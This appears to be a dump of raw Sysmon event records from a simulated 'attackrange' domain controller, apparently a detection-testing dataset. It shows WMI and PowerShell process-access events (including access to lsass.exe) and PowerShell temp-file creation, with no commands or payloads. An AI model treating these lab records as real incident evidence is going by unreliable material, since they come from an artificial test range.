16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D98-603E-9AAA-00000000AD01}634013664C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D98-603E-97AA-00000000AD01}13564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_oogwxblq.siw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D98-603E-97AA-00000000AD01}13564ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ssbrgeuc.jh4.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.388{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002238556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-6D98-603E-93AA-00000000AD01}13748ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB31FFB603E2FFF214F8F5E09FD10738,SHA256=7A2CB3C4DDF1C2A39B993B5688D83CA93852E23EB84F879D25E62259B912848A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.375{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 